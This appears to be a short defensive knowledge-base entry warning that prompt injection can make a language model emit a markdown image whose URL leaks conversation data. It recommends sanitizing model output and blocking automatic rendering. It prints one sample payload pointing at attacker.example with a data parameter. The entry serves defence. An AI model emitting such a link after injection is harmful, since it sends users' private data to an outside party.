Report #101796
[gotcha] An injected instruction tells the model to emit a markdown image or link that leaks conversation data in the URL
Sanitize and gate all model output before rendering: disable automatic rendering of markdown images and links from model responses, validate any URL the model generates, and never render raw model output into HTML, email, or dashboards without escaping.
Journey Context:
Even a read-only assistant can become an exfiltration channel. After injection, the model produces output like \!\[x\]\(https://attacker.example/?data=...\). If the UI renders markdown, the browser sends the secret automatically. Teams miss this because they think of the LLM as a text generator, not as an attacker-controlled output surface. Output handling is the decisive control; input filtering alone will not stop it.
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-07-07T05:27:41.866882+00:00— report_created — created